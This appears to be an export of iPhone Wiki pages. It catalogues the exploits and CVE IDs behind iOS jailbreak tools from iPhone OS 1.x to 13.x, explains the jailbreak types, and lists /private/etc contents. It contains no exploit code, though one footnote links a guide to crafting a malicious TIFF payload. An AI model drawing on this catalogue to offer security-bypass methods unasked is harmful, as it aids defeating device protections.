* Webkit exploit ({{cve|2016-4657}})

=== [[Home Depot]] (9.1-9.3.4) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})

=== [[JailbreakMe 4.0]] (9.1-9.3.4) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})
* Webkit exploit ({{cve|2016-4657}})

=== [[Phœnix]] (9.3.5 / 9.3.6) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* mach_port_register Kernel exploit ({{cve|2016-4669}})

== Programs used to jailbreak 10.x ==

=== [[extra_recipe+yaluX]] (10.0-10.1.1) ===

* set_dp_control_port exploit to execute arbitrary code with kernel privileges. ({{cve|2016-7644}})

=== [[yalu102]] (10.0.1-10.2) ===

* mach_voucher_extract_attr_recipe_trap memory corruption. ({{cve|2017-2370}})

=== [[doubleH3lix]] (10.0.1 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

=== [[Meridian]] (10.0 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

=== [[TotallyNotSpyware]] (10.0 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})
* WebKit JIT optimization bug exploit ({{cve|2018-4233}})

=== [[H3lix]] (10.0.1 - 10.3.4) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

== Programs used to jailbreak 11.x ==

===[[Unc0ver]] (11.0-11.4.1)===

11.0 - 11.1.2

* IOSurface Kernel Exploit ({{cve|2017-13861}})

11.0 - 11.3.1

* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})
* getvolattrlist (empty_list) ({{cve|2018-4243}})

11.0 - 11.4.1

* voucher_swap ({{cve|2019-6225}})

===[[Electra]] (11.0-11.4.1)===

11.0 - 11.1.2

* IOSurface Kernel Exploit ({{cve|2017-13861}})

11.2 - 11.3.1

* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})
* getvolattrlist (empty_list) ({{cve|2018-4243}})

11.2 - 11.4.1

* v1ntex ({{cve|2019-6225}})

== Programs used to jailbreak 12.x ==

===[[Chimera]] (12.0 - 12.2 / 12.4)===

12.0 - 12.1.2

* voucher_swap ({{cve|2019-6225}})

12.0 - 12.2/12.4

* SockPuppet ({{cve|2019-8605}})

===[[Unc0ver]] (12.0 - 12.2 / 12.4 / 12.4.1)===

12.0 - 12.1.2

* voucher_swap ({{cve|2019-6225}})

12.0 - 12.2/12.4

* SockPuppet ({{cve|2019-8605}})

12.4.1

* AppleAVE2Driver exploit ({{cve|2019-8795}})
* AppleSPUProfileDriver information leak ({{cve|2019-8794}})

===[[checkra1n]] (12.3 - 12.4.7)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

== Programs used to jailbreak 13.x ==

===[[Unc0ver]] (13.0 - 13.5)===

* oob_timestamp ({{cve|2020-3837}})
* tachy0n (LightSpeed) ({{cve|2020-9859}})

===[[checkra1n]] (13.0 - 13.5)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

Jailbreak Exploits

2020-07-23T00:00:21Z

Inflatable Man: Corrected capitalization of SockPuppet and corrected its CVE ID.

This page lists the '''exploits''' used in [[jailbreak]]s.

== Common exploits ==
These exploits are not dependent on any firmware; as such, they are used in numerous jailbreaking programs.

* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[M68AP|iPhone]], [[N45AP|iPod touch]], and [[N82AP|iPhone 3G]])
* [[ARM7 Go]] (from iOS 2.1.1) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])
* [[0x24000 Segment Overflow]] (for [[untethered jailbreak]] on [[N88AP|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]] and [[N72AP|iPod touch (2nd generation)]] with [[Bootrom 240.4|old bootrom]]; another exploit as the [[limera1n Exploit]] is required)
* [[limera1n Exploit]] (for [[tethered jailbreak]] on [[N88AP|iPhone 3GS]], [[N18AP|iPod touch (3rd generation)]], [[K48AP|iPad]], [[iPhone 4]], [[N81AP|iPod touch (4th generation)]] and [[K66AP|Apple TV (2nd generation)]])
* [[usb_control_msg(0xA1, 1) Exploit]] (also known as "steaks4uce") (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])

== Jailbreak Programs ==
=== [[PwnageTool]] (2.0 - 5.1.1) ===
* uses different common exploits
* uses the exploits listed below to untether up to iOS 5.1.1

=== [[redsn0w]] (3.0 - 6.0) ===
* uses different common exploits
* uses the same exploits as [[Absinthe|Absinthe]] and [[Absinthe|Absinthe 2.0]] to jailbreak iOS 5.0/5.0.1 and 5.1.1
* uses the exploits listed below to untether up to iOS 5.1.1

=== [[sn0wbreeze]] (3.1.3 - 6.1.3) ===
* uses different common exploits
* uses the exploits listed below to untether up to iOS 6.1.2

== Programs used to jailbreak 1.x ==
=== [[AppTapp Installer]] (1.0 / 1.0.1 / 1.0.2) ===
* iBoot <code>cp</code>-command exploit

=== [[iBrickr]] (1.0 / 1.0.1 / 1.0.2) ===
* iBoot <code>cp</code>-command exploit

=== [[AppSnapp]]/[[JailbreakMe|JailbreakMe 1.0]] (1.0 / 1.0.1 / 1.0.2 / 1.1.1) ===
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]]) ({{cve|2006-3459}})

=== [[mknod|OktoPrep]] (1.1.2) ===
"Upgrade" to 1.1.2 from a jailbroken 1.1.1
* [[mknod]]

=== [[Soft Upgrade]] (1.1.3) ===
"Upgrade" to 1.1.3 from a running jailbroken 1.1.2

=== [[ZiPhone]] (1.1.3 / 1.1.4 / 1.1.5) ===
* [[Ramdisk Hack]]

=== [[iLiberty+|iLiberty / iLiberty+]] (1.1.3 / 1.1.4 / 1.1.5) ===

== Programs used to jailbreak 2.x ==
=== [[QuickPwn]] (2.0 - 2.2.1) ===
* uses [[Pwnage]] and [[Pwnage 2.0]]

=== [[Redsn0w Lite]] (2.1.1) ===
* [[ARM7 Go]] (for [[N72AP|iPod touch (2nd generation)]] only)

== Programs used to jailbreak 3.x ==
=== [[purplera1n]] (3.0) ===
* [[iBoot Environment Variable Overflow]] ({{cve|2009-2795}})
* uses [[0x24000 Segment Overflow]]

=== [[blackra1n]] (3.1 / 3.1.1 / 3.1.2) ===
* [[usb_control_msg(0x21, 2) Exploit]] ({{cve|2010-0038}})
* uses [[0x24000 Segment Overflow]]

=== [[Spirit]] (3.1.2 / 3.1.3 / 3.2) ===
* [[MobileBackup Copy Exploit]]
* [[Incomplete Codesign Exploit]]
* [[BPF_STX Kernel Write Exploit]]

=== [[Star|JailbreakMe 2.0 / Star]] (3.1.2 / 3.1.3 / 3.2 / 3.2.1) ===
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})
* [[Incomplete Codesign Exploit]]
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})

=== [[limera1n]] / [[greenpois0n (jailbreak)|greenpois0n]] (3.2.2) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

== Programs used to jailbreak 4.x ==
=== [[Star|JailbreakMe 2.0 / Star]] (4.0 / 4.0.1) ===
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})
* [[Incomplete Codesign Exploit]]
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})

=== [[limera1n]] (4.0 / 4.0.1 / 4.0.2 / 4.1) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

=== [[greenpois0n (jailbreak)|greenpois0n]] (4.1) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

=== [[greenpois0n (jailbreak)|greenpois0n]] (4.2.1) ===
* uses different common exploits
* [[HFS Legacy Volume Name Stack Buffer Overflow]]

=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.2.6 / 4.2.7 / 4.2.8) ===
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})
* [[HFS Legacy Volume Name Stack Buffer Overflow]]

=== [[unthredeh4il]] (4.2.6 - 4.2.10) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.3 / 4.3.1 / 4.3.2 / 4.3.3) ===
Except for the [[N18AP|iPod touch (3rd generation)]] on iOS 4.3.1.
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})
* [[IOMobileFrameBuffer Privilege Escalation Exploit]] ({{cve|2011-0227}})

=== i0nic's Untether (4.3.1 / 4.3.2 / 4.3.3) ===
used in [[redsn0w]] to untether iOS 4.3.1 / 4.3.2 / 4.3.3
* [[ndrv_setspec() Integer Overflow]]

=== [[unthredeh4il]] (4.3 - 4.3.5) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

== Programs used to jailbreak 5.x ==

=== [[Absinthe]] (5.0 on [[N94AP|iPhone 4S]] only / 5.0.1 on [[iPad 2]] and [[iPhone 4S]]) ===
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}}) (used both for payload injection and untether)
* [[HFS Heap Overflow]] ({{cve|2012-0642}})
* unknown exploit ({{cve|2012-0643}})

=== [[Corona|Corona Untether]] (5.0.1) ===
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}})
* [[HFS Heap Overflow]] ({{cve|2012-0642}})
* unknown exploit ({{cve|2012-0643}})

=== [[Absinthe|Absinthe 2.0]] and [[Rocky Racoon|Rocky Racoon Untether]] (5.1.1) ===
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* Racoon DNS4/WINS4 table buffer overflow ({{cve|2012-3727}})
* MobileBackup2 Copy Exploit

=== [[unthredeh4il]] (5.0-5.1.1) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

== Programs used to jailbreak 6.x ==
=== [[evasi0n]] (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2) ===
* [[Symbolic Link Vulnerability]] ({{cve|2013-0979}})
* [[Timezone Vulnerability]]
* [[Shebang Trick]] ({{cve|2013-5154}})
* [[AMFID code signing evasion]]
* [[launchd.conf untether]]
* [[IOUSBDeviceFamily Vulnerability]] ({{cve|2013-0981}})
* [[ARM Exception Vector Info Leak]] ({{cve|2013-0978}})
* [[dynamic memmove() locating]]
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]
* [[kernel memory write via ROP gadget]]
* [[Overlapping Segment Attack]] ({{cve|2013-0977}})

=== [[p0sixspwn]] (6.1.3 / 6.1.4 / 6.1.5 / 6.1.6) ===
* [[posix_spawn kernel information leak]] ({{cve|2013-3954}}) (by [[i0n1c]])
* [[posix_spawn kernel exploit]] ({{cve|2013-3954}}) (by [[i0n1c]])
* [[mach_msg_ool_descriptor_ts for heap shaping]] ({{cve|2013-3953}})
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})
* [[DeveloperDiskImage race condition]] (by [[comex]])
* [[launchd.conf untether]]

== Programs used to jailbreak 7.x ==
=== [[evasi0n7]] (7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6) ===
{{Section Stub}}
* [[Symbolic Link Vulnerability]] ({{cve|2013-5133}})
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})
* CrashHouseKeeping chmod vulnerability ({{cve|2014-1272}})
* ptmx_get_ioctl ioctl crafted call ({{cve|2014-1278}})

=== [[Geeksn0w]] (7.1 / 7.1.1) ===
* [[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]

=== [[Pangu]] (7.1 / 7.1.1 / 7.1.2) ===
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) (Pangu v1.0.0)
* AppleKeyStore::initUserClient info leak ({{cve|2014-4407}}) (Pangu >v1.0.0)
* break_early_random (by [[i0n1c]] and Tarjei Mandt of Azimuth) ({{cve|2014-4422}})
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* IOSharedDataQueue notification port overwrite ({{cve|2014-4461}})
* "syslogd chown" vulnerability
* enterprise certificate (no real exploit, used for initial "unsigned" code execution)
* "foo_extracted" symlink vulnerability (used to write to /var) ({{cve|2014-4386}})
* /tmp/bigfile (a big file for improvement of the reliability of a race condition)
* VoIP backgrounding trick (used to auto restart the app)
* hidden segment attack

== Programs used to jailbreak 8.x ==
=== [[Pangu8]] (8.0 / 8.0.1 / 8.0.2 / 8.1) ===
* an exploit for a bug in /usr/libexec/neagent (source @iH8sn0w)
* enterprise certificate (inside the IPA)
* a kind of dylib injection into a system process (see IPA)
* a dmg mount command (looks like the Developer DMG) (syslog while jailbreaking)
* a sandboxing problem in debugserver ({{cve|2014-4457}})
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* the same kernel exploit as used in [[Pangu|the first Pangu]] ({{cve|2014-4461}}) (source @iH8sn0w) - now used to also leak kernel memory (source @Morpheus______)
* enable-dylibs-to-override-cache
* a new ovelapping segment attack ({{cve|2014-4455}})

=== [[TaiG]] and [[PPJailbreak]] (8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2) ===
(See also details at [http://newosxbook.com/articles/TaiG.html newosxbook.com])
* A new AFC symlink attack ({{cve|2014-4480}}) - to get onto the device filesystem
* [[DeveloperDiskImage race condition]] (by [[comex]], also used in p0sixspwn) - to mount a fake DDI and instantly overwrite (via union) libmis/xpcd_cache
* A new overlapping segment attack [in a modified version], dyld, ({{cve|2014-4455}}) - negative LC_SEGMENT - to allow libmis and xpcdcache to load
* libmis redirection of MISValidateSignature (as per evasion) to kCFEqual, with overlapping segment variant on TaiG (Segment at end of file, negative)
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis/xpcd_cache)
* MobileStorageMounter exploit ({{cve|2015-1062}})
* Backup exploit used to access restricted parts of the filesystem ({{cve|2015-1087}})

Kernel:

* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) - leaks slid addresses
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* IOHIDFamily Kernel exploit ({{cve|2014-4487}}) - to overwrite memory

=== [[TaiG]] and [[PPJailbreak]] (8.1.3 / 8.2 / 8.3 / 8.4) ===
(See also details at http://newosxbook.com/articles/28DaysLater.html and http://newosxbook.com/articles/HIDeAndSeek.html)
* [[DeveloperDiskImage race condition]] (also used in TaiG for 8.0-8.1.2 but modified) - to mount a fake DDI
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis)
* Symbolic linking to AFC ({{cve|2015-5746}})
* Backup exploit to write to protected regions of the disk ({{cve|2015-5752}})
* Code signing exploit ({{cve|2015-3802}})
* Code signing exploit ({{cve|2015-3803}})
* Code signing exploit ({{cve|2015-3805}})
* Code signing exploit ({{cve|2015-3806}})
* IOHIDFamily exploit ({{cve|2015-5774}})
* Air Traffic exploit to allow attackers to access arbitrary filesystem locations via vectors related to asset handling ({{cve|2015-5766}})

=== [[EtasonJB]] and [[Home Depot]] (8.4.1) ===

* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})

== Programs used to jailbreak 9.x ==
=== [[Pangu9]] (9.0 / 9.0.1 / 9.0.2 / 9.1) ===
* Photos exploit to gain arbitrary unsandboxed file system access as mobile to load outdated DDI. ({{cve|2015-7037}})
* MobileStorageMounter allowed older DeveloperDiskImages to be mounted, resulting in unsandboxed unsigned code execution due to known weaknesses in entitled executables. ({{cve|2015-7051}})
* IOHIDFamily Use-After-Free for kernel information leak / code execution as mobile. ({{cve|2015-6974}})
* dyld exploit in dyld shared cache handling to override MISValidateSignature in libmis.dylib for persistency ({{cve|2015-7079}})
* Racing KPP for some of the patches.
* AMFI MAC Hooks were in non-__const __DATA section, so wouldn't be integrity checked by KPP, allowing to replace MAC hooks required for code-signing. ({{cve|2015-7055}})

=== [[Pangu9]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===
* IOMobileFrameBuffer exploit to execute arbitrary code with kernel privileges. ({{cve|2016-4654}})

=== [[jbme]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===
* Webkit exploit ({{cve|2016-4657}})

=== [[Home Depot]] (9.1-9.3.4) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})

=== [[JailbreakMe 4.0]] (9.1-9.3.4) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})
* Webkit exploit ({{cve|2016-4657}})

=== [[Phœnix]] (9.3.5 / 9.3.6) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* mach_port_register Kernel exploit ({{cve|2016-4669}})

== Programs used to jailbreak 10.x ==

=== [[extra_recipe+yaluX]] (10.0-10.1.1) ===

* set_dp_control_port exploit to execute arbitrary code with kernel privileges. ({{cve|2016-7644}})

=== [[yalu102]] (10.0.1-10.2) ===

* mach_voucher_extract_attr_recipe_trap memory corruption. ({{cve|2017-2370}})

=== [[doubleH3lix]] (10.0.1 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

=== [[Meridian]] (10.0 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

=== [[TotallyNotSpyware]] (10.0 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})
* WebKit JIT optimization bug exploit ({{cve|2018-4233}})

=== [[H3lix]] (10.0.1 - 10.3.4) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

== Programs used to jailbreak 11.x ==

===[[Unc0ver]] (11.0-11.4.1)===

11.0 - 11.1.2

* IOSurface Kernel Exploit ({{cve|2017-13861}})

11.0 - 11.3.1

* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})
* getvolattrlist (empty_list) ({{cve|2018-4243}})

11.0 - 11.4.1

* voucher_swap ({{cve|2019-6225}})

===[[Electra]] (11.0-11.4.1)===

11.0 - 11.1.2

* IOSurface Kernel Exploit ({{cve|2017-13861}})

11.2 - 11.3.1

* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})
* getvolattrlist (empty_list) ({{cve|2018-4243}})

11.2 - 11.4.1

* v1ntex ({{cve|2019-6225}})

== Programs used to jailbreak 12.x ==

===[[Chimera]] (12.0 - 12.2 / 12.4)===

12.0 - 12.1.2

* voucher_swap ({{cve|2019-6225}})

12.0 - 12.2/12.4

* SockPuppet ({{cve|2019-8605}})

===[[Unc0ver]] (12.0 - 12.2 / 12.4 / 12.4.1)===

12.0 - 12.1.2

* voucher_swap ({{cve|2019-6225}})

12.0 - 12.2/12.4

* SockPuppet ({{cve|2019-8605}})

===[[checkra1n]] (12.3 - 12.4.7)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

== Programs used to jailbreak 13.x ==

===[[Unc0ver]] (13.0 - 13.5)===

* oob_timestamp ({{cve|2020-3837}})
* tachy0n (lightspeed) ({{cve|2020-9859}})

===[[checkra1n]] (13.0 - 13.5)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

/private/etc

2020-07-22T23:57:12Z

Inflatable Man: /* Files */ Added that fstab is no longer present in iOS 14

This folder is specified by the [[wikipedia:Filesystem Hierarchy Standard|FHS]] as a place that "contains configuration files" (i.e. "local file[s] used to control the operation of a program"). Most of the folders here are not present in jailed iOS except for raccoon, asl, and ppp.

== Children ==
=== Folders ===
* {{ipfw|alternatives}}
* {{ipfw|apt}}
* {{ipfw|asl}}
* {{ipfw|bluetool}}
* {{ipfw|default}}
* {{ipfw|dpkg}}
* {{ipfw|pam.d}}
* {{ipfw|ppp}}
* {{ipfw|profile.d}}
* {{ipfw|racoon}}
* {{ipfw|rc.d}} (not present in jailed iOS)
* {{ipfw|ssl}}

=== Files ===
* {{ipfw|afp.conf}} (not present in the newer iOS versions)
* {{ipfw|asl.conf}}
* {{ipfw|fstab|fstab}} (only present in iOS < 14)
* {{ipfw|group}}
* {{ipfw|hosts}}
* {{ipfw|host.equiv}}
* {{ipfw|launchd.conf}} (see also: [[launchd.conf Untether]]; not present in the newer iOS versions)
* {{ipfw|master.passwd}}
* {{ipfw|networks}}
* {{ipfw|notify.conf}}
* {{ipfw|passwd}}
* {{ipfw|profile}} (not present in the newer iOS versions)
* {{ipfw|protocols}}
* {{ipfw|services}}
* {{ipfw|ttys}}

== Parents ==
{{parent|private}}

== References ==
* [http://refspecs.linuxfoundation.org/FHS_2.3/fhs-2.3.html#ETCHOSTSPECIFICSYSTEMCONFIGURATION FHS 2.3 on /etc]

Jailbreak

2020-07-22T23:54:16Z

Inflatable Man: Jailbreaks don't touch fstab anymore so I've added that that method is obsolete.

{{float toc|right}}
'''Jailbreak'''ing is the process by which full execute and write access is obtained on all the partitions of iOS, iPadOS, tvOS and watchOS. It used to be done by patching [[/private/etc/fstab]] to mount the System partition as 'read-write'. This is entirely different from an [[unlock]]. Jailbreaking is the first action that must be taken before things like unofficial [[activation]] (hacktivation), and unofficial [[unlock]]ing can be applied.

Older jailbreaks also included modifying the [[AFC]] service (used by [[iTunes]] to access the filesystem) to give full filesystem access from root. This was later updated to create a new service ([[AFC]]2) that allows access to the full filesystem.

Modern jailbreaks now include patching the kernel to get around code signing and other restrictions. These are called [[Kernel Patches]].

'''Note''': The legality of jailbreaking your device varies with each country/region. [[wikipedia:iOS jailbreaking#Legal status|Wikipedia has a summary of legality for some countries]].

== Types of Jailbreaks ==
When a device is booting, it loads Apple's own [[kernel]] initially, so a jailbroken device must be exploited and have the kernel patched each time it is booted up.

An [[untethered jailbreak|'''untethered''' jailbreak]] uses exploits that are powerful enough to allow the user to turn their device off and back on at will, with the device starting up completely, and the kernel will be patched without the help of a computer – in other words, it will be jailbroken even after each reboot.

However, some jailbreaks are [[tethered jailbreak|'''tethered''']]. A tethered jailbreak is only able to temporarily jailbreak the device during a single boot. If the user turns the device off and then boots it back up without the help of a jailbreak tool, the device will no longer be running a patched kernel, and it may get stuck in a partially started state, such as [[Recovery Mode]]. In order for the device to start completely and with a patched kernel, it must be "re-jailbroken" with a computer (using the "boot tethered" feature of a tool) each time it is turned on. All changes to the files on the device (such as installed package files or edited system files) will persist between reboots, including changes that can only function if the device is jailbroken (such as installed package files).

In more recent years, two other solutions have been created - '''semi-tethered''' and '''semi-''un''tethered'''.

A [[semi-tethered jailbreak|'''semi-tethered''']] solution is one where the device is able to start up on its own, but it will no longer have a patched kernel, and therefore will not be able to run modified code. It will, however, still be usable for normal functions, just like stock iOS. To start with a patched kernel, the user must start the device with the help of the jailbreak tool.

A [[semi-untethered jailbreak|'''semi-''un''tethered''']] jailbreak gives the ability to start the device on it's own. On first boot, the device will not be running a patched kernel. However, rather than having to run a tool from a computer to apply the kernel patches, the user is able to re-jailbreak their device with the help of an app (usually sideloaded using [[Cydia Impactor]]) running on their device. In the case of the iOS 9.2-9.3.3 jailbreak, a Safari-based exploit was available, thereby meaning a website could be used to rejailbreak.

In more detail: Each iOS device has a [[bootchain]] that tries to make sure only trusted/signed code is loaded. A device with a tethered jailbreak is able to boot up with the help of a jailbreaking tool because the tool executes exploits via USB that bypass parts of that "chain of trust", bootstrapping to a [[pwned]] (no [[Signature Check Patch|signature check]]) [[iBSS]], [[iBEC]], or [[iBoot (Bootloader)|iBoot]] to finish the boot process.

== Jailbreak Tools ==
Untethered or semi-untethered jailbreaks are shown with a green 'yes'. Tethered or semi-tethered jailbreaks will be stated in a yellow box. [[Beta Firmware]]s are not listed here.



===iPhone OS===
====1.x====
{| class="wikitable"
|-
! rowspan="2" | iPhone OS
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! colspan="2" | Device
|-
! [[M68AP|iPhone]]
! [[N45AP|iPod touch]]
|-
| rowspan="4" | 1.0
| [[AppTapp Installer]]
| class="rborderplz" | 1.0
| rowspan="3" {{yes}}
| rowspan="4" {{n/a}}
|-
| [[iBrickr]]
| class="rborderplz" | 0.5-0.91
|-
| [[iLiberty+]]
| class="rborderplz" | 1.3.0.113
|-
| colspan="2" | The [[libTiff Exploit]]
| {{partial|Yes}}<ref group="1.x" name="libtiff" />
|-
| rowspan="3" | 1.0.1
| [[AppTapp Installer]]
| class="rborderplz" | 1.0
| rowspan="2" {{yes}}
| rowspan="3" {{n/a}}
|-
| [[iBrickr]]
| class="rborderplz" | 0.5-0.91
|-
| colspan="2" | The [[libTiff Exploit]]
| {{partial|Yes}}<ref group="1.x" name="libtiff" />
|-
| rowspan="3" | 1.0.2
| [[AppTapp Installer]]
| class="rborderplz" | 1.0
| rowspan="2" {{yes}}
| rowspan="3" {{n/a}}
|-
| [[iBrickr]]
| class="rborderplz" | 0.6-0.91
|-
| colspan="2" | The [[libTiff Exploit]]
| {{partial|Yes}}<ref group="1.x" name="libtiff" />
|-
| 1.1
| colspan="2" | The [[libTiff Exploit]]
| {{n/a}}
| {{partial|Yes}}<ref group="1.x" name="libtiff" />
|-
| 1.1.1
| colspan="2" | The [[libTiff Exploit]]
| colspan="2" {{partial|Yes}}<ref group="1.x" name="libtiff" />
|-
| 1.1.2
| colspan="2" | [[mknod|OktoPrep]] + [[touchFree]]
| colspan="2" {{partial|Yes}}<ref group="1.x" name="oktoprep-offline" />
|-
| class="rborderplz" rowspan="3" | 1.1.3
| [[iLiberty+|iLiberty / iLiberty+]]
| class="rborderplz" | 1.3.0.113
| colspan="2" {{yes}}
|-
| colspan="2" | [[Soft Upgrade]]
| colspan="2" {{partial|Yes}}<ref group="1.x" name="softupgrade-offline" />
|-
| [[ZiPhone]]
| 3.0
| colspan="2" {{yes}}
|-
| rowspan="3" | 1.1.4
| [[iLiberty+|iLiberty / iLiberty+]]
| class="rborderplz" | 1.3.0.113
| colspan="2" rowspan="3" {{yes}}
|-
| [[PwnageTool]]
| class="rborderplz" | 1.1
|-
| [[ZiPhone]]
| class="rborderplz" | 3.0
|-
| rowspan="2" | 1.1.5
| [[iLiberty+|iLiberty / iLiberty+]]
| class="rborderplz" | 1.3.0.113
| rowspan="2" {{n/a}}
| rowspan="2" {{yes}}
|-
| [[ZiPhone]]
| class="rborderplz" | 3.0
|}
<references group="1.x">
<ref name="libtiff">A maliciously-crafted TIFF, using the [[libTiff Exploit]], loaded into Safari, can be used to jailbreak iPhone OS 1.0-1.1.1. There are several of these TIFFs available - two of the most notable include [https://forums.macrumors.com/threads/377126/ planetbeing's] and [[AppSnapp]]. However, both of these services are now offline, so cannot be used. Even so, a user could still create their own TIFF and payload in order to jailbreak 1.1.1, such as by following [https://mtmdev.org/blog/mtm-devadmin/2018/ios-1-1-1-jailbreak this guide].</ref>
<ref name="oktoprep-offline">It was previously possible to jailbreak 1.1.2 using [[mknod|OktoPrep]] alongside [[touchFree]]. However, the original package repository for OktoPrep through [[Installer.app]] has been taken offline. A user would need to find the original package file for OktoPrep and install it manually in order to jailbreak 1.1.2.</ref>
<ref name="softupgrade-offline">It was previously possible to jailbreak 1.1.3 using [[Soft Upgrade]], but this is no longer possible due to the package repository being taken offline. A user would need to find the original package file for Soft Upgrade and install it manually to jailbreak 1.1.3 using this method.</ref>
</references>

====2.x====
{| class="wikitable"
|-
! rowspan="2" | iPhone OS
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! colspan="4" | Device
|-
! [[M68AP|iPhone]]
! [[N82AP|iPhone 3G]]
! [[N45AP|iPod touch]]
! [[N72AP|iPod touch (2nd generation)]]
|-
| rowspan="2" | 2.0
| [[PwnageTool]]
| class="rborderplz" | 2.0-2.0.3
| colspan="3" {{yes}}
| rowspan="2" {{n/a}}
|-
| [[QuickPwn]]
| class="rborderplz" | RC3-2.2.5
| {{yes}}
| {{no}}
| {{yes}}
|-
| rowspan="2" | 2.0.1
| [[PwnageTool]]
| class="rborderplz" | 2.0.2-2.0.3
| colspan="3" {{yes}}
| rowspan="2" {{n/a}}
|-
| [[QuickPwn]]
| class="rborderplz" | RC3-2.2.5
| {{yes}}
| {{no}}
| {{yes}}
|-
| rowspan="2" | 2.0.2
| [[PwnageTool]]
| class="rborderplz" | 2.0.3
| colspan="3" {{yes}}
| rowspan="2" {{n/a}}
|-
| [[QuickPwn]]
| class="rborderplz" | RC3-2.2.5
| {{yes}}
| {{no}}
| {{yes}}
|-
| rowspan="2" | 2.1
| [[PwnageTool]]
| class="rborderplz" | 2.1-2.2.5
| colspan="3" {{yes}}
| rowspan="2" {{n/a}}
|-
| [[QuickPwn]]
| class="rborderplz" | 2.1-2.2.5
| {{yes}}
| {{no}}
| {{yes}}
|-
| 2.1.1
| class="rborderplz" colspan="2" | [[redsn0w Lite]]
| colspan="3" {{n/a}}
| {{partial|Tethered}}<ref group="2.x">Tethered for devices running the [[Bootrom 240.4|old bootrom]] only. Will not work for devices on the [[Bootrom 240.5.1|new bootrom]] ([[Bootrom 240.5.1|new bootrom]] devices cannot run iPhoneOS 2, only 3).</ref>
|-
| rowspan="2" | 2.2
| [[PwnageTool]]
| class="rborderplz" | 2.2-2.2.5
| colspan="3" {{yes}}
| {{no}}
|-
| [[QuickPwn]]
| class="rborderplz" | 2.2-2.2.5
| {{yes}}
| {{no}}
| {{yes}}
| {{no}}
|-
| rowspan="3" | 2.2.1
